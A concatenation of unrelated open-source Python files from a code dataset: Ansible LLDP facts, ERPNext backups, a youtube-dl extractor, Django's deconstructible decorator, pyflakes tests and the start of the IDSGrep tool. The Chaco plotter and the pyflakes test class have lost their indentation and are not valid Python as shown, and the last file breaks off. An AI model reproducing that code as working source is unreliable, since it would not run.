        # Template dict containing every expected fact key.
        self.generated_spec = utils.generate_dict(facts_argument_spec)
    def populate_facts(self, connection, ansible_facts, data=None):
        """ Populate the facts for lldp_global
        :param connection: the device connection
        :param ansible_facts: Facts dictionary
        :param data: previously collected conf
        :rtype: dictionary
        :returns: facts
        """
        if not data:
            # No cached config supplied: fetch the lldp section from device.
            data = connection.get('show running-config | section lldp')
        obj = {}
        if data:
            obj.update(self.render_config(self.generated_spec, data))
        # Replace any stale lldp_global entry with the freshly parsed one.
        ansible_facts['ansible_network_resources'].pop('lldp_global', None)
        facts = {}
        if obj:
            params = utils.validate_config(self.argument_spec, {'config': obj})
            facts['lldp_global'] = utils.remove_empties(params['config'])
        else:
            facts['lldp_global'] = {}
        ansible_facts['ansible_network_resources'].update(facts)
        return ansible_facts
    def render_config(self, spec, conf):
        """
        Render config as dictionary structure and delete keys
        from spec for null values
        :param spec: The facts tree, generated from the argspec
        :param conf: The configuration
        :rtype: dictionary
        :returns: The generated config
        """
        config = deepcopy(spec)
        config['holdtime'] = utils.parse_conf_arg(conf, 'holdtime')
        config['reinit'] = utils.parse_conf_arg(conf, 'reinit')
        config['timer'] = utils.parse_conf_arg(conf, 'timer')
        # A leading "no" disables the TLV; plain "lldp tlv-select X" enables it.
        for match in re.findall(r'^(no)? lldp tlv-select (\S+)', conf, re.MULTILINE):
            tlv_option = match[1].replace("-", "_")
            config['tlv_select'][tlv_option] = bool(match[0] != "no")
        return utils.remove_empties(config)
| gpl-3.0 |
bravomikekilo/mxconsole | mxconsole/platform/sysconfig.py | 1 | 1840 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""System configuration library.
@@get_include
@@get_lib
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path as _os_path
from mxconsole.util.all_util import remove_undocumented
# pylint: disable=g-import-not-at-top
def get_include():
  """Get the directory containing the TensorFlow C++ header files.
  Returns:
    The directory as string.
  """
  # Import inside the function.
  # sysconfig is imported from the tensorflow module, so having this
  # import at the top would cause a circular import, resulting in
  # the tensorflow module missing symbols that come after sysconfig.
  # from mxconsole.lib.native import pywrap_tensorflow_fs as tf
  # import tensorflow as tf
  # NOTE(review): both candidate imports above are commented out, so `tf` is
  # undefined here and calling this function raises NameError -- confirm
  # whether this API is meant to remain functional in mxconsole.
  return _os_path.join(_os_path.dirname(tf.__file__), 'include')
def get_lib():
  """Get the directory containing the TensorFlow framework library.
  Returns:
    The directory as string.
  """
  # import tensorflow as tf
  # NOTE(review): the import above is commented out, so `tf` is undefined and
  # calling this function raises NameError -- confirm intended behavior.
  return _os_path.join(_os_path.dirname(tf.__file__), 'core')
# Strip every symbol not listed in the module docstring's @@ directives.
_allowed_symbols = []
remove_undocumented(__name__, _allowed_symbols)
| apache-2.0 |
gangadharkadam/v4_erp | erpnext/setup/doctype/backup_manager/backup_manager.py | 37 | 2634 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.document import Document
class BackupManager(Document):
	# Settings DocType only; the work happens in the scheduler hooks below.
	pass
def take_backups_daily():
	"""Scheduler hook: upload backups for services configured as Daily."""
	take_backups_if("Daily")
def take_backups_weekly():
	"""Scheduler hook: upload backups for services configured as Weekly."""
	take_backups_if("Weekly")
def take_backups_if(freq):
	"""Run the Dropbox backup when its configured frequency equals `freq`
	("Daily" or "Weekly")."""
	if frappe.db.get_value("Backup Manager", None, "upload_backups_to_dropbox")==freq:
		take_backups_dropbox()
	# if frappe.db.get_value("Backup Manager", None, "upload_backups_to_gdrive")==freq:
	# 	take_backups_gdrive()
@frappe.whitelist()
def take_backups_dropbox():
	"""Back up to Dropbox and notify the configured recipients by email."""
	did_not_upload, error_log = [], []
	try:
		from erpnext.setup.doctype.backup_manager.backup_dropbox import backup_to_dropbox
		did_not_upload, error_log = backup_to_dropbox()
		if did_not_upload: raise Exception
		send_email(True, "Dropbox")
	except Exception:
		# Pair each failed file with its error, append the traceback, and
		# report the failure by email.
		file_and_error = [" - ".join(f) for f in zip(did_not_upload, error_log)]
		error_message = ("\n".join(file_and_error) + "\n" + frappe.get_traceback())
		frappe.errprint(error_message)
		send_email(False, "Dropbox", error_message)
#backup to gdrive
@frappe.whitelist()
def take_backups_gdrive():
	"""Back up to Google Drive and notify the configured recipients by email."""
	did_not_upload, error_log = [], []
	try:
		from erpnext.setup.doctype.backup_manager.backup_googledrive import backup_to_gdrive
		did_not_upload, error_log = backup_to_gdrive()
		if did_not_upload: raise Exception
		send_email(True, "Google Drive")
	except Exception:
		# Pair each failed file with its error, append the traceback, and
		# report the failure by email.
		file_and_error = [" - ".join(f) for f in zip(did_not_upload, error_log)]
		error_message = ("\n".join(file_and_error) + "\n" + frappe.get_traceback())
		frappe.errprint(error_message)
		send_email(False, "Google Drive", error_message)
def send_email(success, service_name, error_status=None):
	"""Email the configured recipients about the outcome of a backup upload.

	success -- True when the upload completed without errors.
	service_name -- e.g. "Dropbox" or "Google Drive"; used in the message.
	error_status -- error details included in the failure message.
	"""
	from frappe.utils.email_lib import sendmail
	if success:
		subject = "Backup Upload Successful"
		message ="""<h3>Backup Uploaded Successfully</h3><p>Hi there, this is just to inform you
		that your backup was successfully uploaded to your %s account. So relax!</p>
		""" % service_name
	else:
		subject = "[Warning] Backup Upload Failed"
		message ="""<h3>Backup Upload Failed</h3><p>Oops, your automated backup to %s
		failed.</p>
		<p>Error message: %s</p>
		<p>Please contact your system manager for more information.</p>
		""" % (service_name, error_status)
	# Scheduler workers may not have a DB connection yet.
	if not frappe.db:
		frappe.connect()
	recipients = frappe.db.get_value("Backup Manager", None, "send_notifications_to").split(",")
	sendmail(recipients, subject=subject, msg=message)
| agpl-3.0 |
durai145/youtube-dl | youtube_dl/extractor/motorsport.py | 129 | 1797 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import (
compat_urlparse,
)
class MotorsportIE(InfoExtractor):
    """Extractor for motorsport.com video pages.  The media itself is hosted
    on YouTube, so extraction resolves the embedded video id and delegates to
    the Youtube extractor via a url_transparent result."""
    IE_DESC = 'motorsport.com'
    _VALID_URL = r'http://www\.motorsport\.com/[^/?#]+/video/(?:[^/?#]+/)(?P<id>[^/]+)/?(?:$|[?#])'
    _TEST = {
        'url': 'http://www.motorsport.com/f1/video/main-gallery/red-bull-racing-2014-rules-explained/',
        'info_dict': {
            'id': '2-T3WuR-KMM',
            'ext': 'mp4',
            'title': 'Red Bull Racing: 2014 Rules Explained',
            'duration': 208,
            'description': 'A new clip from Red Bull sees Daniel Ricciardo and Sebastian Vettel explain the 2014 Formula One regulations – which are arguably the most complex the sport has ever seen.',
            'uploader': 'mcomstaff',
            'uploader_id': 'UC334JIYKkVnyFoNCclfZtHQ',
            'upload_date': '20140903',
            'thumbnail': r're:^https?://.+\.jpg$'
        },
        'add_ie': ['Youtube'],
        'params': {
            'skip_download': True,
        },
    }
    def _real_extract(self, url):
        display_id = self._match_id(url)
        webpage = self._download_webpage(url, display_id)
        # The page embeds its player in an iframe; fetch that iframe to find
        # the underlying YouTube video id.
        iframe_path = self._html_search_regex(
            r'<iframe id="player_iframe"[^>]+src="([^"]+)"', webpage,
            'iframe path')
        iframe = self._download_webpage(
            compat_urlparse.urljoin(url, iframe_path), display_id,
            'Downloading iframe')
        youtube_id = self._search_regex(
            r'www.youtube.com/embed/(.{11})', iframe, 'youtube id')
        # Hand off to the YouTube extractor.
        return {
            '_type': 'url_transparent',
            'display_id': display_id,
            'url': 'https://youtube.com/watch?v=%s' % youtube_id,
        }
| unlicense |
FEDEVEL/imx6rex-linux-3.10.17 | tools/perf/util/setup.py | 2079 | 1438 | #!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
    """build_ext variant that redirects build output into the directories
    the perf Makefile passes via PYTHON_EXTBUILD_{LIB,TMP} (read below)."""
    def finalize_options(self):
        _build_ext.finalize_options(self)
        self.build_lib = build_lib
        self.build_temp = build_tmp
class install_lib(_install_lib):
    """install_lib variant that installs from the redirected build dir."""
    def finalize_options(self):
        _install_lib.finalize_options(self)
        self.build_dir = build_lib
# Base compiler flags for the extension; the user's CFLAGS are appended.
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
# Build locations and static libraries are handed in by the perf Makefile
# through environment variables.
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
libtraceevent = getenv('LIBTRACEEVENT')
liblk = getenv('LIBLK')
# util/python-ext-sources lists the C sources, one per line; skip blank
# lines and '#' comments.
ext_sources = [f.strip() for f in file('util/python-ext-sources')
		if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
		  sources = ext_sources,
		  include_dirs = ['util/include'],
		  extra_compile_args = cflags,
		  extra_objects = [libtraceevent, liblk],
		 )
setup(name='perf',
      version='0.1',
      description='Interface with the Linux profiling infrastructure',
      author='Arnaldo Carvalho de Melo',
      author_email='acme@redhat.com',
      license='GPLv2',
      url='http://perf.wiki.kernel.org',
      ext_modules=[perf],
      cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
| gpl-2.0 |
rambo/Mindbandlogger | python/visualizer_chaco.py | 1 | 1479 | #!/usr/bin/env python
import sys,os
import reader
# boilerplate
from enthought.traits.api import HasTraits, Instance
from enthought.traits.ui.api import View, Item
from enthought.chaco.api import Plot, ArrayPlotData
from enthought.enable.component_editor import ComponentEditor
from numpy import linspace, sin, array, append
class LinePlot(HasTraits):
plot = Instance(Plot)
traits_view = View(
Item('plot',editor=ComponentEditor(), show_label=False),
width=500, height=500, resizable=True, title="Chaco Plot")
def __init__(self, dataiterator):
super(LinePlot, self).__init__()
xarr = None
yarr = None
for x,y in dataiterator:
if xarr == None:
xarr = array(x)
else:
xarr = append(xarr, x)
if yarr == None:
yarr = array(y)
else:
yarr = append(yarr, y)
print xarr
print yarr
# mangle the X for now, chaco seeminly can't handle datetimes
xarr = array(xrange(len(yarr)))
plotdata = ArrayPlotData(x=xarr,y=yarr)
plot = Plot(plotdata)
plot.plot(("x", "y"), type="line", color="blue")
plot.title = "EEG plot"
self.plot = plot
if __name__ == "__main__":
if (len(sys.argv) < 1):
exit(1)
fp = open(sys.argv[1], 'rb')
reader = reader.rawiterator(fp)
myplot = LinePlot(reader)
myplot.configure_traits()
| gpl-3.0 |
tcwicklund/django | django/utils/deconstruct.py | 502 | 2047 | from importlib import import_module
from django.utils.version import get_docs_version
def deconstructible(*args, **kwargs):
    """
    Class decorator that allow the decorated class to be serialized
    by the migrations subsystem.

    Accepts an optional kwarg `path` to specify the import path.
    """
    path = kwargs.pop('path', None)

    def decorator(klass):
        def __new__(cls, *new_args, **new_kwargs):
            # Record the constructor arguments so deconstruct() can hand
            # them straight back to the migrations framework later.
            instance = super(klass, cls).__new__(cls)
            instance._constructor_args = (new_args, new_kwargs)
            return instance

        def deconstruct(obj):
            """
            Returns a 3-tuple of class import path, positional arguments,
            and keyword arguments.
            """
            # Python 2/fallback version
            if not path:
                module_name = obj.__module__
                name = obj.__class__.__name__
            else:
                module_name, _, name = path.rpartition('.')
            # Make sure it's actually there and not an inner class
            module = import_module(module_name)
            if not hasattr(module, name):
                raise ValueError(
                    "Could not find object %s in %s.\n"
                    "Please note that you cannot serialize things like inner "
                    "classes. Please move the object into the main module "
                    "body to use migrations.\n"
                    "For more information, see "
                    "https://docs.djangoproject.com/en/%s/topics/migrations/#serializing-values"
                    % (name, module_name, get_docs_version()))
            positional, keywords = obj._constructor_args
            return (
                path or '%s.%s' % (obj.__class__.__module__, name),
                positional,
                keywords,
            )

        klass.__new__ = staticmethod(__new__)
        klass.deconstruct = deconstruct
        return klass

    if args:
        return decorator(*args, **kwargs)
    return decorator
| bsd-3-clause |
microelly2/cadquery-freecad-module | CadQuery/Libs/pyflakes/test/test_other.py | 6 | 25072 | """
Tests for various Pyflakes behavior.
"""
from sys import version_info
from pyflakes import messages as m
from pyflakes.test.harness import TestCase, skip, skipIf
class Test(TestCase):
def test_duplicateArgs(self):
self.flakes('def fu(bar, bar): pass', m.DuplicateArgument)
def test_localReferencedBeforeAssignment(self):
self.flakes('''
a = 1
def f():
a; a=1
f()
''', m.UndefinedLocal, m.UnusedVariable)
def test_redefinedInListComp(self):
"""
Test that shadowing a variable in a list comprehension raises
a warning.
"""
self.flakes('''
a = 1
[1 for a, b in [(1, 2)]]
''', m.RedefinedInListComp)
self.flakes('''
class A:
a = 1
[1 for a, b in [(1, 2)]]
''', m.RedefinedInListComp)
self.flakes('''
def f():
a = 1
[1 for a, b in [(1, 2)]]
''', m.RedefinedInListComp)
self.flakes('''
[1 for a, b in [(1, 2)]]
[1 for a, b in [(1, 2)]]
''')
self.flakes('''
for a, b in [(1, 2)]:
pass
[1 for a, b in [(1, 2)]]
''')
def test_redefinedInGenerator(self):
"""
Test that reusing a variable in a generator does not raise
a warning.
"""
self.flakes('''
a = 1
(1 for a, b in [(1, 2)])
''')
self.flakes('''
class A:
a = 1
list(1 for a, b in [(1, 2)])
''')
self.flakes('''
def f():
a = 1
(1 for a, b in [(1, 2)])
''', m.UnusedVariable)
self.flakes('''
(1 for a, b in [(1, 2)])
(1 for a, b in [(1, 2)])
''')
self.flakes('''
for a, b in [(1, 2)]:
pass
(1 for a, b in [(1, 2)])
''')
@skipIf(version_info < (2, 7), "Python >= 2.7 only")
def test_redefinedInSetComprehension(self):
"""
Test that reusing a variable in a set comprehension does not raise
a warning.
"""
self.flakes('''
a = 1
{1 for a, b in [(1, 2)]}
''')
self.flakes('''
class A:
a = 1
{1 for a, b in [(1, 2)]}
''')
self.flakes('''
def f():
a = 1
{1 for a, b in [(1, 2)]}
''', m.UnusedVariable)
self.flakes('''
{1 for a, b in [(1, 2)]}
{1 for a, b in [(1, 2)]}
''')
self.flakes('''
for a, b in [(1, 2)]:
pass
{1 for a, b in [(1, 2)]}
''')
@skipIf(version_info < (2, 7), "Python >= 2.7 only")
def test_redefinedInDictComprehension(self):
"""
Test that reusing a variable in a dict comprehension does not raise
a warning.
"""
self.flakes('''
a = 1
{1: 42 for a, b in [(1, 2)]}
''')
self.flakes('''
class A:
a = 1
{1: 42 for a, b in [(1, 2)]}
''')
self.flakes('''
def f():
a = 1
{1: 42 for a, b in [(1, 2)]}
''', m.UnusedVariable)
self.flakes('''
{1: 42 for a, b in [(1, 2)]}
{1: 42 for a, b in [(1, 2)]}
''')
self.flakes('''
for a, b in [(1, 2)]:
pass
{1: 42 for a, b in [(1, 2)]}
''')
def test_redefinedFunction(self):
"""
Test that shadowing a function definition with another one raises a
warning.
"""
self.flakes('''
def a(): pass
def a(): pass
''', m.RedefinedWhileUnused)
def test_redefinedClassFunction(self):
"""
Test that shadowing a function definition in a class suite with another
one raises a warning.
"""
self.flakes('''
class A:
def a(): pass
def a(): pass
''', m.RedefinedWhileUnused)
def test_redefinedIfElseFunction(self):
"""
Test that shadowing a function definition twice in an if
and else block does not raise a warning.
"""
self.flakes('''
if True:
def a(): pass
else:
def a(): pass
''')
def test_redefinedIfFunction(self):
"""
Test that shadowing a function definition within an if block
raises a warning.
"""
self.flakes('''
if True:
def a(): pass
def a(): pass
''', m.RedefinedWhileUnused)
def test_redefinedTryExceptFunction(self):
"""
Test that shadowing a function definition twice in try
and except block does not raise a warning.
"""
self.flakes('''
try:
def a(): pass
except:
def a(): pass
''')
def test_redefinedTryFunction(self):
"""
Test that shadowing a function definition within a try block
raises a warning.
"""
self.flakes('''
try:
def a(): pass
def a(): pass
except:
pass
''', m.RedefinedWhileUnused)
def test_redefinedIfElseInListComp(self):
"""
Test that shadowing a variable in a list comprehension in
an if and else block does not raise a warning.
"""
self.flakes('''
if False:
a = 1
else:
[a for a in '12']
''')
def test_redefinedElseInListComp(self):
"""
Test that shadowing a variable in a list comprehension in
an else (or if) block raises a warning.
"""
self.flakes('''
if False:
pass
else:
a = 1
[a for a in '12']
''', m.RedefinedInListComp)
def test_functionDecorator(self):
"""
Test that shadowing a function definition with a decorated version of
that function does not raise a warning.
"""
self.flakes('''
from somewhere import somedecorator
def a(): pass
a = somedecorator(a)
''')
def test_classFunctionDecorator(self):
"""
Test that shadowing a function definition in a class suite with a
decorated version of that function does not raise a warning.
"""
self.flakes('''
class A:
def a(): pass
a = classmethod(a)
''')
@skipIf(version_info < (2, 6), "Python >= 2.6 only")
def test_modernProperty(self):
self.flakes("""
class A:
@property
def t(self):
pass
@t.setter
def t(self, value):
pass
@t.deleter
def t(self):
pass
""")
def test_unaryPlus(self):
"""Don't die on unary +."""
self.flakes('+1')
def test_undefinedBaseClass(self):
"""
If a name in the base list of a class definition is undefined, a
warning is emitted.
"""
self.flakes('''
class foo(foo):
pass
''', m.UndefinedName)
def test_classNameUndefinedInClassBody(self):
"""
If a class name is used in the body of that class's definition and
the name is not already defined, a warning is emitted.
"""
self.flakes('''
class foo:
foo
''', m.UndefinedName)
def test_classNameDefinedPreviously(self):
"""
If a class name is used in the body of that class's definition and
the name was previously defined in some other way, no warning is
emitted.
"""
self.flakes('''
foo = None
class foo:
foo
''')
def test_classRedefinition(self):
"""
If a class is defined twice in the same module, a warning is emitted.
"""
self.flakes('''
class Foo:
pass
class Foo:
pass
''', m.RedefinedWhileUnused)
def test_functionRedefinedAsClass(self):
"""
If a function is redefined as a class, a warning is emitted.
"""
self.flakes('''
def Foo():
pass
class Foo:
pass
''', m.RedefinedWhileUnused)
def test_classRedefinedAsFunction(self):
"""
If a class is redefined as a function, a warning is emitted.
"""
self.flakes('''
class Foo:
pass
def Foo():
pass
''', m.RedefinedWhileUnused)
@skip("todo: Too hard to make this warn but other cases stay silent")
def test_doubleAssignment(self):
"""
If a variable is re-assigned to without being used, no warning is
emitted.
"""
self.flakes('''
x = 10
x = 20
''', m.RedefinedWhileUnused)
def test_doubleAssignmentConditionally(self):
"""
If a variable is re-assigned within a conditional, no warning is
emitted.
"""
self.flakes('''
x = 10
if True:
x = 20
''')
def test_doubleAssignmentWithUse(self):
"""
If a variable is re-assigned to after being used, no warning is
emitted.
"""
self.flakes('''
x = 10
y = x * 2
x = 20
''')
def test_comparison(self):
"""
If a defined name is used on either side of any of the six comparison
operators, no warning is emitted.
"""
self.flakes('''
x = 10
y = 20
x < y
x <= y
x == y
x != y
x >= y
x > y
''')
def test_identity(self):
"""
If a defined name is used on either side of an identity test, no
warning is emitted.
"""
self.flakes('''
x = 10
y = 20
x is y
x is not y
''')
def test_containment(self):
"""
If a defined name is used on either side of a containment test, no
warning is emitted.
"""
self.flakes('''
x = 10
y = 20
x in y
x not in y
''')
def test_loopControl(self):
"""
break and continue statements are supported.
"""
self.flakes('''
for x in [1, 2]:
break
''')
self.flakes('''
for x in [1, 2]:
continue
''')
def test_ellipsis(self):
"""
Ellipsis in a slice is supported.
"""
self.flakes('''
[1, 2][...]
''')
def test_extendedSlice(self):
"""
Extended slices are supported.
"""
self.flakes('''
x = 3
[1, 2][x,:]
''')
def test_varAugmentedAssignment(self):
"""
Augmented assignment of a variable is supported.
We don't care about var refs.
"""
self.flakes('''
foo = 0
foo += 1
''')
def test_attrAugmentedAssignment(self):
"""
Augmented assignment of attributes is supported.
We don't care about attr refs.
"""
self.flakes('''
foo = None
foo.bar += foo.baz
''')
class TestUnusedAssignment(TestCase):
"""
Tests for warning about unused assignments.
"""
def test_unusedVariable(self):
"""
Warn when a variable in a function is assigned a value that's never
used.
"""
self.flakes('''
def a():
b = 1
''', m.UnusedVariable)
def test_unusedVariableAsLocals(self):
"""
Using locals() it is perfectly valid to have unused variables
"""
self.flakes('''
def a():
b = 1
return locals()
''')
def test_unusedVariableNoLocals(self):
"""
Using locals() in wrong scope should not matter
"""
self.flakes('''
def a():
locals()
def a():
b = 1
return
''', m.UnusedVariable)
def test_assignToGlobal(self):
"""
Assigning to a global and then not using that global is perfectly
acceptable. Do not mistake it for an unused local variable.
"""
self.flakes('''
b = 0
def a():
global b
b = 1
''')
@skipIf(version_info < (3,), 'new in Python 3')
def test_assignToNonlocal(self):
"""
Assigning to a nonlocal and then not using that binding is perfectly
acceptable. Do not mistake it for an unused local variable.
"""
self.flakes('''
b = b'0'
def a():
nonlocal b
b = b'1'
''')
def test_assignToMember(self):
"""
Assigning to a member of another object and then not using that member
variable is perfectly acceptable. Do not mistake it for an unused
local variable.
"""
# XXX: Adding this test didn't generate a failure. Maybe not
# necessary?
self.flakes('''
class b:
pass
def a():
b.foo = 1
''')
def test_assignInForLoop(self):
"""
Don't warn when a variable in a for loop is assigned to but not used.
"""
self.flakes('''
def f():
for i in range(10):
pass
''')
def test_assignInListComprehension(self):
"""
Don't warn when a variable in a list comprehension is
assigned to but not used.
"""
self.flakes('''
def f():
[None for i in range(10)]
''')
def test_generatorExpression(self):
"""
Don't warn when a variable in a generator expression is
assigned to but not used.
"""
self.flakes('''
def f():
(None for i in range(10))
''')
def test_assignmentInsideLoop(self):
"""
Don't warn when a variable assignment occurs lexically after its use.
"""
self.flakes('''
def f():
x = None
for i in range(10):
if i > 2:
return x
x = i * 2
''')
def test_tupleUnpacking(self):
"""
Don't warn when a variable included in tuple unpacking is unused. It's
very common for variables in a tuple unpacking assignment to be unused
in good Python code, so warning will only create false positives.
"""
self.flakes('''
def f(tup):
(x, y) = tup
''')
self.flakes('''
def f():
(x, y) = 1, 2
''', m.UnusedVariable, m.UnusedVariable)
self.flakes('''
def f():
(x, y) = coords = 1, 2
if x > 1:
print(coords)
''')
self.flakes('''
def f():
(x, y) = coords = 1, 2
''', m.UnusedVariable)
self.flakes('''
def f():
coords = (x, y) = 1, 2
''', m.UnusedVariable)
def test_listUnpacking(self):
"""
Don't warn when a variable included in list unpacking is unused.
"""
self.flakes('''
def f(tup):
[x, y] = tup
''')
self.flakes('''
def f():
[x, y] = [1, 2]
''', m.UnusedVariable, m.UnusedVariable)
def test_closedOver(self):
"""
Don't warn when the assignment is used in an inner function.
"""
self.flakes('''
def barMaker():
foo = 5
def bar():
return foo
return bar
''')
def test_doubleClosedOver(self):
"""
Don't warn when the assignment is used in an inner function, even if
that inner function itself is in an inner function.
"""
self.flakes('''
def barMaker():
foo = 5
def bar():
def baz():
return foo
return bar
''')
def test_tracebackhideSpecialVariable(self):
"""
Do not warn about unused local variable __tracebackhide__, which is
a special variable for py.test.
"""
self.flakes("""
def helper():
__tracebackhide__ = True
""")
def test_ifexp(self):
"""
Test C{foo if bar else baz} statements.
"""
self.flakes("a = 'moo' if True else 'oink'")
self.flakes("a = foo if True else 'oink'", m.UndefinedName)
self.flakes("a = 'moo' if True else bar", m.UndefinedName)
def test_withStatementNoNames(self):
"""
No warnings are emitted for using inside or after a nameless C{with}
statement a name defined beforehand.
"""
self.flakes('''
from __future__ import with_statement
bar = None
with open("foo"):
bar
bar
''')
def test_withStatementSingleName(self):
"""
No warnings are emitted for using a name defined by a C{with} statement
within the suite or afterwards.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as bar:
bar
bar
''')
def test_withStatementAttributeName(self):
"""
No warnings are emitted for using an attribute as the target of a
C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
import foo
with open('foo') as foo.bar:
pass
''')
def test_withStatementSubscript(self):
"""
No warnings are emitted for using a subscript as the target of a
C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
import foo
with open('foo') as foo[0]:
pass
''')
def test_withStatementSubscriptUndefined(self):
"""
An undefined name warning is emitted if the subscript used as the
target of a C{with} statement is not defined.
"""
self.flakes('''
from __future__ import with_statement
import foo
with open('foo') as foo[bar]:
pass
''', m.UndefinedName)
def test_withStatementTupleNames(self):
"""
No warnings are emitted for using any of the tuple of names defined by
a C{with} statement within the suite or afterwards.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as (bar, baz):
bar, baz
bar, baz
''')
def test_withStatementListNames(self):
"""
No warnings are emitted for using any of the list of names defined by a
C{with} statement within the suite or afterwards.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as [bar, baz]:
bar, baz
bar, baz
''')
def test_withStatementComplicatedTarget(self):
"""
If the target of a C{with} statement uses any or all of the valid forms
for that part of the grammar (See
U{http://docs.python.org/reference/compound_stmts.html#the-with-statement}),
the names involved are checked both for definedness and any bindings
created are respected in the suite of the statement and afterwards.
"""
self.flakes('''
from __future__ import with_statement
c = d = e = g = h = i = None
with open('foo') as [(a, b), c[d], e.f, g[h:i]]:
a, b, c, d, e, g, h, i
a, b, c, d, e, g, h, i
''')
def test_withStatementSingleNameUndefined(self):
"""
An undefined name warning is emitted if the name first defined by a
C{with} statement is used before the C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
bar
with open('foo') as bar:
pass
''', m.UndefinedName)
def test_withStatementTupleNamesUndefined(self):
"""
An undefined name warning is emitted if a name first defined by a the
tuple-unpacking form of the C{with} statement is used before the
C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
baz
with open('foo') as (bar, baz):
pass
''', m.UndefinedName)
def test_withStatementSingleNameRedefined(self):
"""
A redefined name warning is emitted if a name bound by an import is
rebound by the name defined by a C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
import bar
with open('foo') as bar:
pass
''', m.RedefinedWhileUnused)
def test_withStatementTupleNamesRedefined(self):
"""
A redefined name warning is emitted if a name bound by an import is
rebound by one of the names defined by the tuple-unpacking form of a
C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
import bar
with open('foo') as (bar, baz):
pass
''', m.RedefinedWhileUnused)
def test_withStatementUndefinedInside(self):
"""
An undefined name warning is emitted if a name is used inside the
body of a C{with} statement without first being bound.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as bar:
baz
''', m.UndefinedName)
def test_withStatementNameDefinedInBody(self):
"""
A name defined in the body of a C{with} statement can be used after
the body ends without warning.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as bar:
baz = 10
baz
''')
def test_withStatementUndefinedInExpression(self):
"""
An undefined name warning is emitted if a name in the I{test}
expression of a C{with} statement is undefined.
"""
self.flakes('''
from __future__ import with_statement
with bar as baz:
pass
''', m.UndefinedName)
self.flakes('''
from __future__ import with_statement
with bar as bar:
pass
''', m.UndefinedName)
@skipIf(version_info < (2, 7), "Python >= 2.7 only")
def test_dictComprehension(self):
"""
Dict comprehensions are properly handled.
"""
self.flakes('''
a = {1: x for x in range(10)}
''')
@skipIf(version_info < (2, 7), "Python >= 2.7 only")
def test_setComprehensionAndLiteral(self):
"""
Set comprehensions are properly handled.
"""
self.flakes('''
a = {1, 2, 3}
b = {x for x in range(10)}
''')
def test_exceptionUsedInExcept(self):
as_exc = ', ' if version_info < (2, 6) else ' as '
self.flakes('''
try: pass
except Exception%se: e
''' % as_exc)
self.flakes('''
def download_review():
try: pass
except Exception%se: e
''' % as_exc)
def test_exceptWithoutNameInFunction(self):
"""
Don't issue false warning when an unnamed exception is used.
Previously, there would be a false warning, but only when the
try..except was in a function
"""
self.flakes('''
import tokenize
def foo():
try: pass
except tokenize.TokenError: pass
''')
def test_exceptWithoutNameInFunctionTuple(self):
"""
Don't issue false warning when an unnamed exception is used.
This example catches a tuple of exception types.
"""
self.flakes('''
import tokenize
def foo():
try: pass
except (tokenize.TokenError, IndentationError): pass
''')
def test_augmentedAssignmentImportedFunctionCall(self):
"""
Consider a function that is called on the right part of an
augassign operation to be used.
"""
self.flakes('''
from foo import bar
baz = 0
baz += bar()
''')
@skipIf(version_info < (3, 3), 'new in Python 3.3')
def test_yieldFromUndefined(self):
"""
Test C{yield from} statement
"""
self.flakes('''
def bar():
yield from foo()
''', m.UndefinedName)
| lgpl-3.0 |
ogrodas/idsgrep | idsgrep/idsgrep.py | 1 | 6985 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""IDSGrep is a GNU Grep wrapper that understands IPv4-addresses, IPv4CIDRs, IPv4-Ranges and Domains
"""
import logging
logging.basicConfig(format="%(asctime)s - %(levelname)8s - %(message)s")
import sys
import datetime
import csv
import ConfigParser
import argparse
import matchingengine
import signatureset
import alarm
USAGE=\
"""
idsgrep [OPTIONS] PATTERN [FILE...]
idsgrep [OPTIONS] [--black-db HOST | --black-file FILE] [FILE...]
"""
def main():
try:
args=parse_args()
setup_logging(args)
TibIDS(args)
except KeyboardInterrupt,e:
sys.stderr.write("User presdd Ctrl+C. Exiting..\n")
except IOError as (errno, strerror):
if errno==32 and strerror=="Broken pipe":
sys.stderr.write("Broken pipe. Exiting..\n")
else:
logging.exception(strerror)
except Exception,e:
logging.exception(str(e))
def parse_args(argv=None):
    """Parse command-line options, optionally seeding defaults from -c FILE.

    Two-stage parse: a minimal parser first extracts --conf_file so that
    the [Defaults] section of that INI file becomes the default values
    for the real parser, which then handles the remaining arguments
    (and -h/--help).
    """
    if argv is None:
        argv = sys.argv
    # Parse any conf_file specification
    # We make this parser with add_help=False so that
    # it doesn't parse -h and print help.
    conf_parser = argparse.ArgumentParser(
        # Don't mess with format of description
        formatter_class=argparse.RawDescriptionHelpFormatter,
        # Turn off help, so we print all options in response to -h
        add_help=False
    )
    conf_parser.add_argument("-c", "--conf_file",
                        help="Specify config file", metavar="FILE")
    args, remaining_argv = conf_parser.parse_known_args()
    if args.conf_file:
        config = ConfigParser.SafeConfigParser()
